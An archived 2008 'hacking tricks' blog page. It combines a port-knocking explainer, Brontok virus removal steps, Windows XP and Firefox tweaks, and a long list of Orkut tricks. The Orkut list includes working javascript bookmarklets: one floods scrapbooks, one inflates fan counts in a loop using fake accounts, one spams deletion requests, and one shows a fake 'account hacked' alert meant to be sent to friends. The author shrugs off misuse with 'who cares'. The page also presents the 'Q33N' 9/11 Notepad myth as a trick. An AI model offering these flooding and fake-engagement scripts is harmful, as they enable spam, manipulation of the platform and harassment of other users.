HACKING TRICKS AND TIPS

windows tricks,xp tricks tips,pc tricks,pc tips,hacking tricks,tricks windows xp,xp tricks,computer tricks,computer tips, windows xp tricks and tips,xp window

Archive for September, 2008

What is port knocking??||All about port knocking

Posted by cracksandhacks on September 13, 2008

In computing, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specified port(s).

This is usually implemented by configuring a daemon to watch the firewall log file for said connection attempts then modify the firewall configuration accordingly. It can also be performed by a process examining packets at a higher level (using packet capture interfaces such as Pcap), allowing the use of already “open” TCP ports to be used within the knock sequence. Port knocking is most often used to determine access to port 22, the Secure Shell (SSH) port. The port “knock” itself is similar to a secret handshake and can consist of any number of TCP, UDP or even sometimes ICMP and other protocol packets to numbered ports on the destination machine. The complexity of the knock can be anything from a simple ordered list (e.g. TCP port 1000, TCP port 2000, UDP port 3000) to a complex time-dependent, source-IP-based and other-factor-based encrypted hash.

A port knock setup takes next to no resources and very simple software to implement. A portknock daemon on the firewall machine listens for packets on certain ports (either via the firewall log or by packet capture). The client user would carry an extra utility, which could be as simple as netcat or a modified ping program or as complicated as a full hash-generator, and use that before they attempted to connect to the machine in the usual way.

Most portknocks are stateful systems in that if the first part of the “knock” has been received successfully, an incorrect second part would not allow the remote user to continue and, indeed, would give the remote user no clue as to how far through the sequence they failed. Usually the only indication of failure is that, at the end of the knock sequence, the port expected to be open is not opened. No packets are sent to the remote user at any time.
While this technique for securing access to remote network daemons has not yet been widely adopted by the security community, it has been integrated in newer rootkits.

Step 3

Enlarge

Step 3

Step 4

Enlarge

Step 4

How Port knocking works in theory

Step 1 (A) Client cannot connect to application listening on port n; (B) Client cannot establish connection to any port.

Step 2 (1,2,3,4) Client tries to connect to a well-defined set of ports in sequence by sending certain packets; Client has prior knowledge of the port knocking daemon and its configuration, but receives no acknowledgement during this phase because firewall rules preclude any response.

Step 3 (A) Server process (a port knocking daemon) intercepts connection attempts and interprets (decrypts and decodes) them as comprising an authentic “port knock”; server carries out specific task based on content of port knock, such as opening port n to the client.

Step 4 (A) Client connects to port n and authenticates using application’s regular mechanism.

Benefits of port knocking

Consider that, if an external attacker did not know the port knock sequence, even the simplest of sequences would require a massive brute force effort in order to be discovered. A three-knock simple TCP sequence (e.g. port 1000, 2000, 3000) would require an attacker without prior knowledge of the sequence to test every combination of three ports in the range 1-65535, and then to scan each port in between to see if anything had opened. As a stateful system, the port would not open until after the correct three-digit sequence had been received in order, without other packets in between.

That equates to approximately 655354 packets in order to obtain and detect a single successful opening. That’s approximately 18,445,618,199,572,250,625 or 18 million million million packets. On the average attempt it would take approximately 9 million million million packets to successfully open a single, simple three-port TCP-only knock by brute force. This is made even more impractical when knock attempt-limiting is used to stop brute force attacks, longer and more complex sequences are used and cryptographic hashes are used as part of the knock.

When a port knock is successfully used to open a port, the firewall rules are generally only opened to the IP address that supplied the correct knock. This is similar to only allowing a certain IP whitelist to access a service but is also more dynamic. An authorised user situated anywhere in the world would be able to open the port he is interested in to only the IP that he is using without needing help from the server administrator. He would also be able to “close” the port once he had finished, or the system could be set up to use a timeout mechanism, to ensure that once he changes IP’s, only the IP’s necessary are left able to contact the server. Because of port knocking’s stateful behaviour, several users from different source IP addresses can simultaneously be at varying levels of the port knock. Thus it is possible to have a genuine user with the correct knock let through the firewall even in the middle of a port attack from multiple IP’s (assuming the bandwidth of the firewall is not completely swamped). To all other IP addresses, the ports still appear closed and there is no indication that there are other users who have successfully opened ports and are using them.

Using cryptographic hashes inside the port knock sequence can mean that even sniffing the network traffic in and out of the source and target machines is ineffective against discovering the port knock sequence or using traffic replay attacks to repeat prior port knock sequences. Even if somebody did manage to guess, steal or sniff the port knock and successfully use it to gain access to a port, the usual port security mechanisms are still in place, along with whatever service authentication was running on the opened ports.

The software required, either at the server or client end, is minimal and can in fact be implemented as simply as a shell script for the server or a Windows batch file and a standard Windows command line utility for the client. Overhead in terms of traffic, CPU and memory consumption is at an absolute minimum. Port knock daemons also tend to be so simple that any sort of vulnerability is obvious and the code is very easily auditable. With a portknock system in place on ports such as the SSH port, it can prevent brute force password attacks on logins. The SSH daemon need not even wake up as any attempt that is made without the correct portknock will bounce harmlessly off the TCP/IP stack rather than the SSH authentication. As far as any attacker is concerned, there is no daemon running on that port at all until he manages to correctly knock on the port. The system is completely customisable and not limited to opening specific ports or, indeed, opening ports at all. Usually a knock sequence description is tied with an action, such as running a shell script, so when a specific sequence is detected by the port knock daemon, the relevant shell script is run. This could add firewall rules to open ports or do anything else that was possible in a shell script. Many portknocks can be used on a single machine to perform many different actions, such as opening or closing different ports.

Due to the fact that the ports appear closed at all times until a user knowing the correct knock uses it, port knocking can help cut down not only on brute force password attacks and their associated log spam but also protocol vulnerability exploits. If an exploit was discovered that could compromise SSH daemons in their default configuration, having a port knock on that SSH port could mean that the SSH daemon may not be compromised in the time before it was updated. Only authorised users would have the knock and therefore only authorised users would be able to contact the SSH server in any way. Thus, random attempts on SSH servers by worms and viruses trying to exploit the vulnerability would not reach the vulnerable SSH server at all, giving the administrator a chance to update or patch the software. Although not a complete protection, port knocking would certainly be another level of defense against random attacks and, properly implemented, could even stop determined, targeted attacks.

Port knocking generally has some disregard in the security world, given that early implementations basically consisted of a number of ports that had to be hit in order. However, the best of modern portknock systems are much more complex, some using highly secure cryptographic hashes in order to defeat the most common attacks (such as packet sniffing and packet replay). Additionally, portknock systems can include blacklists, whitelists and dynamic attack responses as can any internet service, however, even the simplest of port knocks controls access to a system before attackers are able to hit a service that allocates memory, CPU time or other significant resources and also acts as a barrier against brute-force attempts, automated vulnerability exploits, etc. Also, port knocking does not generally lower the security of a system overall. Indeed, it provides another layer of security for minimal overhead. In a worst case scenario however, the port knocking software introduced a new security problem or lowers security due to risk compensation.


i liked to share this information its really Knowledgeable

http://en.wikipedia.org/wiki/Port_knocking

Cool Computer Tricks

Speed up computer

autochk not found

MAC OS look for windows XP

Make Fake Viruses in windows Xp

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

Posted in computer tricks, hacking | Tagged: , , | Leave a Comment »

Remove Brontok virus manually

Posted by cracksandhacks on September 13, 2008

its the most sticky virus ..

u can Remove it

be an ethical Hacker

It works~~!!


Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor:-

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v “DisableRegistryTools”
and run HKLM\software\microsoft\windows\currentversion\policies\system /v “DisableRegistryTools”

after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-
HKLM\Software\Microsoft\Windows\Currentversion\Run

on the right side delete the entries which contain ‘Brontok’ and ‘Tok-’ words.

after that restart ur system
open registry editor and follow the path to enable folder option in tools menu

HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ ‘NoFolderOption’
delete this entry and restart ur computer

and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.

ur computer is completely free from virus brontok

Cool Computer Tricks

Speed up computer

autochk not found

MAC OS look for windows XP

Make Fake Viruses in windows Xp

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

Posted in virus removal | Tagged: , , | 1 Comment »

All orkut tricks||Best orkut tricks||Orkut hacking tricks

Posted by cracksandhacks on September 13, 2008

Please report immediately if any of the tricks stops working : may depend on the browser.

I recommend u doing all the tricks on Opera Browser
.. it supports java scripts the most efficient way.

No need to install Ny “greesymonkey” scripts.. it works well wid all the browsers

1)The Most Wanted

  • Orkut Flooder

  1. please dont missuse this code

  2. your account will get freezed for some time

  3. who cares

copy and paste this code in your Scrapbook’s Address Bar

javascript:i=0;sar=document.getElementsByTagName(‘TEXTAREA’).item(0).value;document.body.innerHTML+=’<iframe name=”TextFlooding” width=”680″ height=”430″></iframe>’;document.forms[1].target=’TextFlooding’;setInterval(” document.getElementsByTagName(‘TEXTAREA’).item(0).value=sar +’ ‘+ i;a=submitForm(document.forms[1], ’submit’, ”);i++”,2000);void(0)

COMPLETELY WORKING.. PLEASE LEAVE COMMENTS IN CASE OF ANY PROBLEM..

Trick Number Two “STAR”: Fainted brain

Try &#9733 in your scrap book editor box above your Scraps and Write Your Message

Voila!! a STAR comes up Before ur Message. isnt it Cool

Drop in Your Comments Please

also see trick : 21

3 ) Secret Writings in Orkut : Fainted brain

I came across the tip some time back which will allow you to write scraps in reverse order… more like mirror image llits quite common now but Still

write this code at the beginning of the scrap without quotes
“&#8238″

4) Many of u Won’t Know this : Fainted brain

You can see where all of your orkut friends are located by checking out the new “friends map” feature. This feature combines Google Maps and orkut profiles to let you see where all of your friends live around the world. To see the “friends map,” just follow these steps:
1. Click the “view friends” link in the “my friends” box on your orkut homepage.
2. Click the “friends map” tab at the top of the page.

You can click on a friend’s profile picture to see their location on the map. Please know that if we don’t have map data for a particular region or if your friend chose not to put their location in their orkut profile, you’ll see a message “(not on map)” below their profile name.
You can also click on the “tiny little blue men” to see your friends’ locations. By clicking on one of these figures, a bubble will pop open to let you know which friend lives in that location.

Trust me an Intellegent Feature of Orkut

While U are singned in at Orkut : click in The Link Below: its Gr8

Or copy and Paste the following in Your Address Bar

http://www.orkut.com/Map.aspx

5)Watch the Pictures of ur Friends in Action:

copy and paste this code in your Scrapbook’s Address Bar

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position=’absolute’; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval(‘A()’,5); void(0)

6) Blank Scrap

How to write blank scrap / blank post ?
If you like the service, please do refer your friends to use our free service by clicking HERE

For writing blank scrap, follow the steps:

1) Open any scrapbook.
2) Write [i] in the scrapbook.
3) Do NOT write anything else in the scrapbook, and submit the scrap.
That’s all.
NOTE:
You can also use [b] tag instead of [i] tag
You can also use this method to post a blank entry in any community forum
.

7) Colorful Scrap

For writing multi colored scrap, follow the steps:

1) Open any scrapbook.

2) Write your message in the scrap. Do NOT click on submit.

3) Copy the following text and paste it in your address bar

javascript:cor=new Array(‘aqua’,'blue’,'fuchsia’,'gold’,'gray’,'green’,'lime’,'maroon’,'navy’,'olive’,'orange’,'pink’,'purple’,'red’,’silver’,'teal’,'violet’, ‘yellow’ );var z=0;txt=document.getElementsByTagName(‘textarea’)[0];txt.value=txt.value.replace(/(.)/gi,”§$1″);txt.value=txt.value.replace(/\§ /gi,” “);for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,’['+cor[z]+’]');z++;if(z==cor.length){z=0}}void(0)

4) Hit ENTER key .
5) Click on Submit

n ur scrap is now multicoloured

8) How to make your name invisible in your profile?

For making your name invisible follow the steps:
1) Click on edit profile
2) Type ALT + 0173 in your first name and last name. (i.e. Type 0173 while pressing the ALT key of your keyboard.)
3) Click on Update

8.1) Make your Picture invisible in your profile !

In MS Paint, create the smallest image possible and den upload it I.E. 1X1 pic!!
virtually unclickable ! n u are invisible now !!

9) Image Expander


To expand the display image of any profile

1) Open any profile whose display image you want to expand.
2) Copy the following text and paste it in your address bar

javascript:mwunm=128;void(setInterval(“mwunm++;document.images[2].width=mwunm”,5))

3) Hit ENTER key of your keyboard.

10) Double the size of your Friends Image


Follow the steps:
1) Open any profile whose friends’ images you wish to double.
2) Copy the following text and paste it in your address bar

javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,”medium”);void(0)

3) Hit ENTER key

11) Image Roller


Follow the steps:
1) Open any page that contains images.
2) Copy the following text and paste it in your address bar

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position=’absolute’;DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval(‘R++;B(R%DIL)’,15);void(0)

3) Hit ENTER key

12) Increase Fans ( Working Code ) Really Amazing

Follow the steps:

1) Create a fake account or simply login with ur friends Id.. and add yourself as a friend there.

2) Visit the FRIENDS page by logging into your just created fake account or the Friends account.

3) Point your cursor on the fan icon () beside your real profile. Note your status bar. It should be showing something like javascript:setKarma(‘FRUS*******/US*******’). Note the code FRUS******* and US******* somewhere. Now, click on the star so as to make your fake account a fan of your real account.

4) Copy the following code to your address bar (The location where you type http://www.orkut.com ). Replace FRUS******* and US******* in the following script with the one you noted in the above step.

javascript:function cmd(){window.location=”/setkarma?cat=0&val=3&gid=FRUS*******/US*******”;}void(setInterval(cmd,2000));

5) Hit ENTER key of your keyboard. The page will keep on reloading and your fans will keep on increasing with an approximate speed of 6 fans per second untl you close the window.

13) Mirror Links

These links if clicked redirects the person who clicked to his/her profile..
U can use these in Your Profile like :MY best frnd” and any one who clicks on these links u define will see hes/her own profile.

this will give out d profile:

http://www.orkut.com/Profile.aspx???2pid=11731517960896443124

this will give out the Album :

http://www.orkut.com/AlbumView.aspx?2uid=3492118394569816171

this will give out the Scrapbook :

http://www.orkut.com/Scrapbook.aspx?2uid=6849219260034274333

14) Make ur Page Colorful

1) Open your scrapbook.

2) Copy the following text and paste it in your address bar

javascript: i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval(‘i++;a[i % document.links.length].style.color=c[i % c.length]‘,10);void(0);

3) Hit ENTER key

15) A Java Trick that Pops Message ” Ur Account Is Hacked”

javascript:function reverse() { var inp = ” ! luhaR yb dekcah si tnuocca tukrO ruoY “; var outp=”";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();

copy and paste d Above link On Address Bar.. n replace “luhaR” by ur own Name.. n send it to ur friends

Or u can Manually create Any kind of Alert Box by

javascript:alert(” TYPE ANY MESSAGE HERE TO APPEAR IN ALERT BOX “)

copy and paste d above in the address Bar,

16) Watch the Pictures With a Snake Effect

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position=’absolute’;DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval(‘R++;B(R%DIL)’,15);void(0)

17) Negative Posts : u see the Posts in negative numbers

javascript:sar=document.getElementsByTagName(‘input’);document.body.innerHTML+=’<iframe name=”NegFlood” width=”0″ frameborder=”0″ height=”0″></iframe>’;document.forms[1].target=’NegFlood’;omdt_lowposts=setInterval(“sar['topicId'].value=”;sar['commId'].value=”;sar['messageId'].value=”;submitForm(document.forms[1],’delete’,”)”, 1000);void(0)

Note: You need to be the author/Creator of the topic in the Community to be able to use this …….

18) Try These Cool Font Generators : Its Easy

First Write Your Message in the Scrap Text Box . After you Are Done with typing your message
Simply Copy and Paste these Links In the Address Bar above the same page( scrapbook page )

javascript:var txt=document.getElementsByTagName(‘textarea’)[0];txt.value=txt.value.replace(/A/gi,”Å”);txt.value=txt.value.replace(/B/gi,”ß”);txt.value=txt.value.replace(/C/gi,”©”);txt.value=txt.value.replace(/D/gi,”Д);txt.value=txt.value.replace(/E/gi,”Ë”);txt.value=txt.value.replace(/F/gi,”ƒ”);txt.value=txt.value.replace(/i/gi,”î”);txt.value=txt.value.replace(/s/gi,”§”);txt.value=txt.value.replace(/o/gi,”ø”);txt.value=txt.value.replace(/u/gi,”µ”);txt.value=txt.value.replace(/r/gi,”®”);void(0);

This is the Second One

javascript:cor=new Array(‘u’,'b’,'i’,'u’);var z=1;txt=document.getElementsByTagName(‘textarea’)[0];txt.value=txt.value.replace(/(.)/gi,”§$1″);txt.value=txt.value.replace(/\§ /gi,” “);for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,’[/'+cor[z-1]+’]'+’['+cor[z]+’]');z++;if(z==cor.length){z=1}}void(0)

19 ) Lame trick to frustate someone:


just creeped to my mind so m sharin wid you.

The best link to setup as your homepage is https://www.orkut.com/GLogin.aspx?cmd=logout
When someone click on this the person will be logged out from his/her orkut session

20) Speed up Logging to Orkut.


Bookmark the following link and use it to login into orkut!

https://www.google.com/…………www.orkut.com%2FGLogin.aspx

The above link directly opens orkut login box! So it is faster than normal orkut login.

21) Adding Special Symbols in Scraps !!!!!!!!!!!!!!!

This is a much awaited trick on Orkut
very less users know about it
be d one n Impress ur friends !!

here it is

Press alt key and d following 4rm num pad …

alt + 987 – █
alt + 1 – ☺
alt + 2 – ☻
alt + 3 – ♥
alt + 4 – ♦
alt + 5 – ♣
alt + 6 – ♠
alt + 7 – •
alt + 8 – ◘
alt + 9 – ○

alt + 0178 – ²
alt + 0489 – é
alt + 0756 – ô
alt + 0742 – æ
alt + 0719 – Ï
alt + 0739 – ã
alt + 0729 – Ù

the same way many combinations can be tried..
keep trying it and do upload it here as comments

keep posting.


22) Crush List On Orkut!! full Explanation

Have you ever wondered how the Orkut “Add to my crush-list” option works?

Most of us are scared to add someone to our crush-list
because of the fear that he/she will get a notification from Orkut that you have added him/her on your crush-list.

YES, they will get such a notification.
But that is only if they too add you on their crush list.
In fact, you both will get a message from Orkut if you both have added each other on your respective crush lists.

This is a fantastic piece of innovation from Orkut wherein one-side crushes
will not be notified and if mutual crush exists, then both sides will come to
know of it.

Spreading this information is important. It will help the cause of many
people and who knows, you may be the lucky one too!!!

So start adding people to your crush-lists now and spreading this vital
information!!!


23) Write scraps in Hindi !


Right click on the link below n open it in a new window !

click here to write in hindi

Cool Computer Tricks

MAC OS look for windows XP

Make Fake Viruses in windows Xp

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

Add item to right click

autochk not found

Posted in internet tricks, orkut tricks | Tagged: , , , | Leave a Comment »

Top Tricks & Cheats -(Microsoft cheats)

Posted by cracksandhacks on September 13, 2008

Set Processes Priority


Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

CTRL-SHIFT-ESC

1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option


2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s

Shutdown Trick !

Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ‘ Ctrl ‘ key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.

Speed Up Ur Shut down !!


Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the “Control” Folder.
Select “WaitToKillServiceTimeout”
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200)
.

and !

Like previous versions of windows, it takes long time to restart or shutdown windows xp when the “Exit Windows” sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on “Exit Windows” sub-menu and highlight it.now from sounds you can select,choose “none” and then click apply and ok. now you can see some improvements when shutting down your system.


**new **

Crazy !!

Hide ur folders.. never known trick !!!!!!!!!! Disguise them to “Recycle Bin”

Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u’ve a folder games
press F2,
then type, “games.{645FF040-5081-101B-9F08-00AA002F954E}”
c the magic….
then 2 get to original form,
remove the extension using
“ren games.{645FF040-5081-101B-9F08-00AA002F954E} games” in dos or as a bat file

n u are done..

~cheers~

System information


system up time only for xp professional edition
It boasts how long it can stay up. Whereas previous
versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from
the All Programs start button option, and then type
’systeminfo’. The computer will produce a lot of
useful info, including the uptime. If you want to keep
these, type ’systeminfo > info.txt’. This creates a
file called info.txt you can look at later with
Notepad. (Professional Edition only).

lock pc just by double clicking mouse

You can lock your XP workstation with two clicks of
the mouse. Create a new shortcut on your desktop using
a right mouse click, and enter ‘rundll32.exe
user32.dll,LockWorkStation’ in the location field.
Give the shortcut a name you like. That’s it — just
double click on it and your computer will be locked.
And if that’s not easy enough, Windows key + L will do
the same.

SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)

Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the “plugins” directory to the “Optional” directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad..

Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.

The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords

It Works

~ Cheers ~
*

Remove the Username and picture from Windows XP New Start Menu

The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.

For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

From that folder, rename the BMP file which corresponds to your user account.

( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
Next, rename the following folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures

to something else, say…

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures
To remove the user name, follow these steps

Start regedit.exe and navigate to the this key:

HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer
In the right-pane, set NoUserNameInStartMenu value-data to 1

Close Regedit.exe and restart Windows.

You’ll end up with a blue space at the top of the Start Menu.

To get back the username and the picture, reverse the above procedure.

For the New Start Menu, Windows XP looks for the <username>.bmp file in the folder

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

If the file is not found, it takes a picture from the “Default Pictures” sub-folder. By renaming the <username>.bmp and the “Default Pictures” folder, you’re giving no chance for Windows to fetch an image for the Start Menu

~ Cheers ~.

Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!

Well quite old but here is d complete collection

Step 1: Open Notepad
Step 2: Write following line in the notepad.

this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.

Voilla!!

or

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON’T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

or

Open a note pad
type Bush hid the facts
save that file,
close it
again open and see…

NOTEPAD “world trade centre trick”.. :

Did you know that the flight number of the plane that had hit WTC …on
9/11 was Q33N ….Open your Notepad in ur computer and type the flight
number i.e Q33N… Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings
.

log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

WHY?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a “Byte-Order Mark” (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

~ cheers ~

SPEED UP MENU DISPLAY.!!


When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.

Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.

Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
Select MenuShowDelay from the list on the right.

Right on it and select Modify.
Change the value to 0.
Reboot your computer.

CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!

Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it’ll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
1. Open up regedit
2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler
3. Delete the “Default” value which should be “{87D62D94-71B3-4b9a-9489-5FE6850DC73E}”
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.

CD ROM STOPS AUTOPLAYING/AUTORUN.!!

And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
Solution: The service: “Shell Hardware Detection” has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to “Automatic
“.

How to make your Desktop Icons Transparent

Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab “Use drop shadows for icon labels on the Desktop”

DISPLAY MESSAGE ON STARTUP.

Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart

AUTO DELETE TEMPORARY FOLDER.!!


ll what i prefer is %temp% ” without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..

First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click “Do Not Delete Temp Folder Upon Exit”
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.

make ur pdf files to speak


make ur pdf files to speak
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher

ctrl+shift+b —->to hear the whole topic
ctrl+shift+v —->to hear the page

Enjoy

<!– /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:”"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:”Times New Roman”; mso-fareast-font-family:”Times New Roman”;} a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;} p {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:”Times New Roman”; mso-fareast-font-family:”Times New Roman”;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;} div.Section1 {page:Section1;} –>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Table Normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:”";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”Times New Roman”;}

Cool Computer Tricks

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

autochk not found

Speed up computer

Posted in computer tricks, hacking | Tagged: , , | Leave a Comment »

speed up firefox||Firefox tricks

Posted by cracksandhacks on September 12, 2008

1. Type “about:config” into the address bar and hit return. Scroll
down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:

Set “network.http.pipelining” to “true”

Set “network.http.proxy.pipelining” to “true”

Set “network.http.pipelining.maxrequests” to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.
Name it “nglayout.initialpaint.delay” and set its value to “0″.
This value is the amount of time the browser waits before it acts on information it recieves.

If you’re using a brodband connection you’ll load pages 2-3 times faster now.

Cool Computer Tricks

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

